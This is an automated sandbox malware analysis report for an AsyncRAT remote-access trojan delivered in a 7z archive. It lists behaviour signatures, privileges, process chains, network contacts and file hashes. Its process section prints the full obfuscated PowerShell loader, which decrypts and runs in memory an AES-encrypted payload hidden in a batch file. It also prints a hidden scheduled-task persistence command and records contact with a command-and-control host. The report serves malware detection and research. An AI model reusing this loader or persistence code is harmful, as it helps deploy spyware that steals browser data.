Malware Analysis Report

2024-08-06 12:58

Sample ID 240605-qhxcsagd6s
Target Files.7z
SHA256 54d46fbfeb589b2847878580392ae4aff98a0c59b0731541e311f5718023688d
Tags
asyncrat rfu execution rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54d46fbfeb589b2847878580392ae4aff98a0c59b0731541e311f5718023688d

Threat Level: Known bad

The file Files.7z was found to be: Known bad.

Malicious Activity Summary

asyncrat rfu execution rat spyware stealer

AsyncRat

Async RAT payload

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-05 13:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-05 13:16

Reported

2024-06-05 13:17

Platform

win10v2004-20240508-en

Max time kernel

43s

Max time network

52s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Files.7z

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\startup_str_240.bat.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Desktop\startup_str_240.bat.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Users\Admin\Desktop\startup_str_240.bat.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\startup_str_240.bat.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3332 wrote to memory of 4104 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\Desktop\startup_str_240.bat.exe
PID 3332 wrote to memory of 4104 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\Desktop\startup_str_240.bat.exe
PID 4104 wrote to memory of 3244 | N/A | C:\Users\Admin\Desktop\startup_str_240.bat.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 3244 | N/A | C:\Users\Admin\Desktop\startup_str_240.bat.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 4352 | N/A | C:\Users\Admin\Desktop\startup_str_240.bat.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 4352 | N/A | C:\Users\Admin\Desktop\startup_str_240.bat.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 1584 | N/A | C:\Users\Admin\Desktop\startup_str_240.bat.exe | C:\Windows\System32\WScript.exe
PID 4104 wrote to memory of 1584 | N/A | C:\Users\Admin\Desktop\startup_str_240.bat.exe | C:\Windows\System32\WScript.exe
PID 1584 wrote to memory of 3020 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 3020 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2316 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe
PID 3020 wrote to memory of 2316 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe
PID 2316 wrote to memory of 4636 | N/A | C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2316 wrote to memory of 4636 | N/A | C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Files.7z

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Files.7z"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\startup_str_240.bat" "

C:\Users\Admin\Desktop\startup_str_240.bat.exe

"startup_str_240.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_uhLDX = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\startup_str_240.bat').Split([Environment]::NewLine);foreach ($_A_fLlBB in $_A_uhLDX) { if ($_A_fLlBB.StartsWith(':: @')) { $_A_NbTKf = $_A_fLlBB.Substring(4); break; }; };$_A_NbTKf = [System.Text.RegularExpressions.Regex]::Replace($_A_NbTKf, '_A_', '');$_A_WVlpt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_NbTKf);$_A_Nltui = New-Object System.Security.Cryptography.AesManaged;$_A_Nltui.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_Nltui.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_Nltui.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lGuXRwARexqT9x64aF65VNd3vz0xg4bu9gRf+fDmuaA=');$_A_Nltui.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uoqVYFCFIwzuGh66WuDKhQ==');$_A_jhFfk = $_A_Nltui.CreateDecryptor();$_A_WVlpt = $_A_jhFfk.TransformFinalBlock($_A_WVlpt, 0, $_A_WVlpt.Length);$_A_jhFfk.Dispose();$_A_Nltui.Dispose();$_A_UQaMS = New-Object System.IO.MemoryStream(, $_A_WVlpt);$_A_gYDat = New-Object System.IO.MemoryStream;$_A_LiXRH = New-Object System.IO.Compression.GZipStream($_A_UQaMS, [IO.Compression.CompressionMode]::Decompress);$_A_LiXRH.CopyTo($_A_gYDat);$_A_LiXRH.Dispose();$_A_UQaMS.Dispose();$_A_gYDat.Dispose();$_A_WVlpt = $_A_gYDat.ToArray();$_A_DYwut = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_WVlpt);$_A_AkCGN = $_A_DYwut.EntryPoint;$_A_AkCGN.Invoke($null, (, [string[]] ('')))

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Desktop\startup_str_240')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_181_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_181.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_181.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_181.bat" "

C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe

"startup_str_181.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_uhLDX = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_181.bat').Split([Environment]::NewLine);foreach ($_A_fLlBB in $_A_uhLDX) { if ($_A_fLlBB.StartsWith(':: @')) { $_A_NbTKf = $_A_fLlBB.Substring(4); break; }; };$_A_NbTKf = [System.Text.RegularExpressions.Regex]::Replace($_A_NbTKf, '_A_', '');$_A_WVlpt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_NbTKf);$_A_Nltui = New-Object System.Security.Cryptography.AesManaged;$_A_Nltui.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_Nltui.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_Nltui.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lGuXRwARexqT9x64aF65VNd3vz0xg4bu9gRf+fDmuaA=');$_A_Nltui.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uoqVYFCFIwzuGh66WuDKhQ==');$_A_jhFfk = $_A_Nltui.CreateDecryptor();$_A_WVlpt = $_A_jhFfk.TransformFinalBlock($_A_WVlpt, 0, $_A_WVlpt.Length);$_A_jhFfk.Dispose();$_A_Nltui.Dispose();$_A_UQaMS = New-Object System.IO.MemoryStream(, $_A_WVlpt);$_A_gYDat = New-Object System.IO.MemoryStream;$_A_LiXRH = New-Object System.IO.Compression.GZipStream($_A_UQaMS, [IO.Compression.CompressionMode]::Decompress);$_A_LiXRH.CopyTo($_A_gYDat);$_A_LiXRH.Dispose();$_A_UQaMS.Dispose();$_A_gYDat.Dispose();$_A_WVlpt = $_A_gYDat.ToArray();$_A_DYwut = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_WVlpt);$_A_AkCGN = $_A_DYwut.EntryPoint;$_A_AkCGN.Invoke($null, (, [string[]] ('')))

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_181')

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
NL | 23.62.61.194:443 | www.bing.com | tcp
US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | new22.vpndns.net | udp
DE | 94.130.130.51:116 | new22.vpndns.net | tcp
US | 8.8.8.8:53 | 51.130.130.94.in-addr.arpa | udp
DE | 94.130.130.51:116 | new22.vpndns.net | tcp

Files

C:\Users\Admin\Desktop\startup_str_240.bat

MD5 02dce5d2f3da53f3bfa165bfb6372c53
SHA1 699f6a7fde4aa873a4499bdefb3e9bd2c180cc86
SHA256 0cc0e3fe599b7bd362dd160efafaefd26c692934682cc13e12575c05aa028a99
SHA512 cf78595e03f9a65514b5e4b15bf40b204568fad2d956bfbaddd513349df28b8b37ed18d6ca3f7724ab765ea6ca34ff493b427e424a2b7bd2b33206ad871acbc3

C:\Users\Admin\Desktop\startup_str_240.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/4104-11-0x00000170417B0000-0x00000170417D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4yhpgugb.kkr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4104-19-0x0000017041B80000-0x0000017041DD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f3b2f7c8e9b3057a4342efce5cb1f648
SHA1 cbcab1b48cd397259c504d2c915c5c30ea877b06
SHA256 2c3dc036ac8d51e14510a0a6bba650d29e55c394b3b564a5f762c2fc1ebc3693
SHA512 f627a062084919835cdfadcaa06849d6a636e4b2f6a24317c29e78183c02b4e2ffa9cf0911f627efc2143514695a1b3e70141866f61c722039721182cd5fb142

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 75b4b2eecda41cec059c973abb1114c0
SHA1 11dadf4817ead21b0340ce529ee9bbd7f0422668
SHA256 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA512 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

C:\Users\Admin\AppData\Roaming\startup_str_181.vbs

MD5 47494d2160f5389d7933766312b12d8a
SHA1 0fbf0f34250407171a6b9355d45432f9123f77da
SHA256 c2d635edf26922d3c1d0bbd1812aaa86da10ab60bc8f85a3c962b97c2b3be2e2
SHA512 680b86046afdd5d0c0f7ed30de2a0bf128aa50820968bb5d5f00c06ea351c4accfb2e7d0ceb9ba8768c63a0dc90065b8f670805bed02e5c749bc513ce08fedbe

memory/2316-78-0x000001AC5A260000-0x000001AC5A276000-memory.dmp